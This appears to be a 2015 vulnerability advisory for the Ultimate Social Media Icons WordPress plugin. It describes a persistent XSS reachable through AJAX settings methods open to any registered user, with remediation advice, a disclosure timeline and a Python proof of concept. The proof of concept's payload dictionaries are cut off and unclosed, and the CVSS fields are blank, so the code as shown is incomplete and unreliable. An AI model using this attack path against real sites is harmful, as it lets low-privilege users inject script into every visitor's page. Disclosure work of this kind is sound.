Ultimate Social Media and Share Icons, Persistent XSS

The Ultimate Social Media Icons plugin exposes several AJAX methods to all registered users, regardless of user level (see content of ultimate-social-media-icons/libs/controllers/sfsi_buttons_controller.php). These methods are used to update settings in the plugin, with regards to display of buttons / text on the site. By providing a few specific parameters, it is possible to achieve a Persistent XSS attack, which will be displayed on every page of the site (including the settings screen for the plugin in the administration panel).



CVSS Score


CSSS Vector


Attack Scope


Authorization Required



Implement nonces and access control (via roles) to all sensitive AJAX methods. Sanitize user input to these methods.

Proof of Concept

The following PoC will result in an alert being presented on all pages of the site, including the settings screen for the plugin in the administration panel.

import requests
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
r = s.post(url, data=payload)


  • 2015-05-15: Discovered
  • 2015-05-15: Vendor notified
  • 2015-05-15: Vendor responded
  • 2015-05-23: Version released – issue resolved
  • 2015-05-30: Advisory released